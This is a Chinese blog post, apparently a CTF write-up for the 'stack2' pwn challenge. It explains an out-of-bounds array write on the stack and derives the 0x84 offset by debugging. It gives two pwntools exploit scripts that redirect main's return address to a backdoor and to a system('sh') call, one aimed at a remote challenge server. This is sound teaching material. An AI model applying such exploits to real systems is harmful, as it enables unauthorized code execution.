3.stack2

最新推荐文章于 2022-12-18 23:07:11 发布
最新推荐文章于 2022-12-18 23:07:11 发布
阅读量399 收藏
点赞数
分类专栏: 攻防世界进阶pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44864859/article/details/107619101
版权

这是一道数组越界的题目。数组存放在栈上,程序中给出有修改数组中数据的功能,但是没有限制范围,使得其可以修改栈上任意地址。

image-20200727165529724

所以我只需要将main函数的返回地址修改成后门函数就可以了。

image-20200727165559094

接下来就是确定偏移,这里把我卡住了。最一开始的想法是直接用返回地址减去输入地址,得到的偏移是0x9c,带入测试发现不行。看到这里有人肯定都要嘲笑我了,我真的是太蠢了,而且还觉得没什么问题捣鼓了半天,太菜了。。。

言归正传,要定偏移,首先我们需要搞清楚程序中修改数组数据的部分具体是怎么执行的。

屏幕快照 2020-07-27 17.03.38

这里可以看到程序具体要修改的地址是由ebp+eax+var_70计算得到的(eax中存放的就是我们输入的偏移),因此我们进行调试,在0x0804884D和0x080488f2处下断点

屏幕快照 2020-07-27 17.08.34

屏幕快照 2020-07-27 17.09.21

所以 0xffffcfb8 + eax - 0x70 = 0xffffcfcc => eax = 0x84

exp:

from pwn import *

p = process('./jisuan')
context.log_level = 'DEBUG'
system_bish_addr = 0x0804859b

leave_offset = 0x84

def write_adrr(addr,va):
    p.sendline('3')
    p.recvuntil('which number to change:\n')
    p.sendline(str(addr))
    p.recvuntil('new number:\n')
    p.sendline(str(va))
    p.recvuntil('5. exit\n')

def dbg():
	gdb.attach(p)
	pause()



p.sendlineafter('How many numbers you have:\n','1')
p.sendlineafter('Give me your numbers\n','2')
p.recvuntil('5. exit\n')

write_adrr(leave_offset,0x9b)
write_adrr(leave_offset+1,0x85)
write_adrr(leave_offset+2,0x04)
write_adrr(leave_offset+3,0x08)

p.sendline('5')
p.interactive()

由于远程攻击时提示没有bash,所以只好自己构造system调用

exp:

from pwn import *

p = remote('220.249.52.133',53268)
offest = 0x84
system_plt_addr = 0x08048450
sh_addr = 0x08048987

def write_addr(offest,res):
    p.sendline('3')
    p.recvuntil("which number to change:")
    p.sendline(str(offest))
    p.recvuntil("new number:")
    p.sendline(str(res))
    p.recvuntil("5. exit")

p.recvuntil("How many numbers you have:")
p.sendline('1')
p.recvuntil("Give me your numbers")
p.sendline('2')
p.recvuntil("5. exit")
write_addr(offest,0x50)
write_addr(offest+1,0x84)
write_addr(offest+2,0x04)
write_addr(offest+3,0x08)
offest += 8 
write_addr(offest,0x87)
write_addr(offest+1,0x89)
write_addr(offest+2,0x04)
write_addr(offest+3,0x08)
p.sendline('5')
p.interactive()
棂星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
stack2(xctf)
weixin_43868725的博客
05-26 721
0x0 程序保护和流程 保护: 流程: 当选择change number时没有对数组边界进行检查所以可以任意地址写。又在函数列表中发现一个hackhere() 0x1 利用过程 我们只需要通过数组写入这个函数的地址到main函数的返回地址处即可。简单计算一下。 v13这个数组首地址距离返回地址0x70+0x4,发现不行。然后用ida远程调试一下。输入了五个数字分别是1,2,3,4,5。offset=0xFFBDC56C-0xFFBDC4E8=0x84。 远程发现没有bash。 换成system(
攻防世界 stack2
10-07 503
1.题目 2.IDA分析 3.分析 本地存在明显的数组越界漏洞,选择3修改数据时,没有检查是否越界,直接操作指针进行修改。所以我们只要利用这个漏洞构造system的调用即可(注意,function区的hackhere方法不可用,调用会提示不存在bash。。。) 所以这道题目最难在于addr_buf与addr_ret之间的距离。一开始看ida的栈信息,以为是74h,结果溢出失败。 这种情况很明显是编译器做了什么处理,所以只能动态调试。 在show data方法里面下断点,位置:0x80
攻防世界pwn——stack2
qq_62076255的博客
12-18 623
攻防世界pwn——stack2做题记录
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3438
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
攻防世界高手进阶区——stack2
weixin_62675330的博客
02-24 964
攻防世界高手进阶区——stack2 看题目啥都没有 一,分析文件 checksec 发现居然存在栈溢出保护,这是以前做题没看到过的,可能会有新的知识点。 运行文件 貌似是一个输入数字计算平均值的程序。 ida打开 unsigned int m; // [esp+34h] [ebp-74h] char v13[100]; // [esp+38h] [ebp-70h] unsigned int v14; // [esp+9Ch] [ebp-Ch] v14 = __readgs
stack
qq_41078889的博客
08-18 2010
stack是一种先进后出的数据结构。stack除了最顶端元素外,没有其他办法去读取其他元素,因此stack不存在遍历行为。所以stack没有迭代器。 stack容器适配器的创建 由于 stack 适配器以模板类 stack<T,Container=deque>(其中 T 为存储元素的类型,Container 表示底层容器的类型)的形式位于头文件中,并定义在 std 命名空间里。 stack<int> values; 上面这行代码,就成功创建了一个可存储 int 类型元素
Stack
cczsmile的博客
04-11 1026
 Stack功能简介   Stack也叫作堆叠。堆叠是由一些通过堆叠口相连的以太网交换机组成的一个管理域,其中包括一个主交换机和若干个从交换机。    堆叠在一起的以太网交换机可以看作为一个设备,用户可以通过主交换机实现对堆叠内所有交换机的管理。    堆叠主交换机简介当多个以太网交换机通过堆叠口相连时,用户可以在其中一台交换机上进行配置,把它们设置成堆叠,并把当前进行配置的以太网交换机设置为堆叠...
torch.stack()的官方解释,详解以及例子
12-21
- 当`dim=2`时,形状为[2, 3, 4],张量沿第三个维度堆叠。 - 如果`dim`超出范围(如`dim=3`),则会引发`IndexError`,因为没有足够大的维度进行堆叠。 4. **应用场景** 在NLP中,`stack()`常用于处理序列数据,...
看完秒懂torch.stack()
01-21
torch.stack ()在这里插入图片描述一、准备数据二、dim=0三、dim=1四、dim=2 一、准备数据 首先把基本的数据准备好: import torch import numpy as np # 创建3*3的矩阵,a、b a=np.array([[1,2,3],[4,5,6],[7,8,...
torch.stack, torch.cat, torch.stack.max/mean/sum维度变换详解
jsk_learner的博客
03-25 6397
torch.stack,torch.cat, torch.stack.max/mean/sumtorch.stack创建两个[x,x,x,x]tensor变量torch.stack([x,x], dim=0)torch.stack([x,x], dim=1)torch.stack([x,x], dim=2)torch.stack([x,x], dim=3)torch.stack([x,x], di...
np.stack() 解释
weixin_43956764的博客
04-10 863
np.stack()我的理解是堆叠数据,把不同维度的数据组合起来。 代码如下: #生成数据 a=np.zeros((3,4)) b=np.ones((3,4)) c=np.array(b+1) #堆叠数组 s0=np.stack([a,b,c],axis=0) #第0维,堆叠整个数组 array s1=np.stack([a,b,c],axis=1) #第1维,堆叠 数组第1维的数据 array[] s2=np.stack([a,b,c],axis=2) #第2维,堆叠 数组第2维的数据 arra
pytorch中torch.stack()的功能
qinseheming0820的博客
07-14 907
首先看一下官方文档对torch.stack()函数功能的描述: 将一系列tensor沿着dim维度方向串联起来,所有的tensor必须具备相同的大小,其中维度的大小必须是在0到需要被串联的tensor的维度大小之间,如被串联的tensor是一个二维平面,则dim不能大于2。简单来说:就是把多个2维张量串联成3维张量,把多个3维张量串联为4维张量,以此类推就是在增加新的维度进行堆叠。举个例子:将3个2维张量进行torch.stack()操作。首先准备3个2维的3行4列数据如下图: 数据形状如下
[XCTF]stack2(你的疑问可以在这里找到答案)
qq_62539372的博客
07-10 272
前面的必要流程就不多说啦 这道题开了栈溢出保护 运行一下似乎找不到可以利用的点 那就看看这里吧 v13这个数组 在第三个选项change的时候没有限制 so 我们可以在main函数结束的时候改变返回地址 hackhere函数里有个system('/bin/bash')不同于system('/bin/sh')打通之后会出现没有bash所以我们不能直接利用hackhere这个函数的地址当作main函数的返回地址!我们可以把plt表的system函数的地址当作返回地址,传参'sh'思路有啦 我们接下来就要考虑在哪
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 754
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1034
—XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
攻防世界pwn-stack2学习记录
Hotspurs的博客
11-18 1363
pwn新手一枚,做这题时苦苦没找出来题解上说的0x84偏移,经过多次尝试,终于找到了正确的方式,遂以记录。 首先分析漏洞点: 当选择3.change number时,程序没有对输入的v5进行检测,遂可以产生溢出 之后看到程序给了getflag 开启动态调试,此时在v13[v5] = v7;处下断点。 如图所示输入 转到汇编指令,查看这个地址(edx存的就是输入9,看看他把9...
攻防世界-pwn stack2(ROP)
菜的只能随便写写博客
10-28 1943
0x01 文件分析 32位elf 无PIE   0x02 运行分析  程序的功能主要有四个,在输入前面两个初始化的变量值之后,就可以看到后面的几个功能。   0x03 IDA分析 //IDA 静态分析得出的代码: int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax uns...
Stash安装和破解
weixin_34232744的博客
11-14 1533
参考资料: http://www.unxmail.com/?p=590 上篇介绍了,Atlassian Stash v2.12.1 破解版的下载, 有同学不会安装. 我重新整理了下文档. 表述我的安装方法和环境. 先下载破解安装包.http://pan.baidu.com/s/1mgumBbE 我的安装环境. 说明下,经过我的测试. 如果系统内存低于 512M, 就不要折腾了,非常卡. 推荐 20...
logstash-2-插件配置
weixin_33827731的博客
08-22 114
配置语法:  Logstash必须有一个 input 和一个 output 1, 处理输入的input  1), 从文件录入 logstash使用一个名为 filewatch的 ruby gem库来监听文件变化, 这个库记录一个 .sincedb的数据文件跟踪监听日志文件的当前位置 input { file { path =&gt; ["/var/log/*.log", ...
torch.stack
最新发布
08-04
比如,使用dim=2,我们可以将a和b在第2维度上进行堆叠,生成一个3x3x2的张量。[3] 总结来说,torch.stack函数可以将多个张量在指定维度上进行堆叠,生成一个新的张量。它的作用类似于将多个矩阵按照指定维度进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值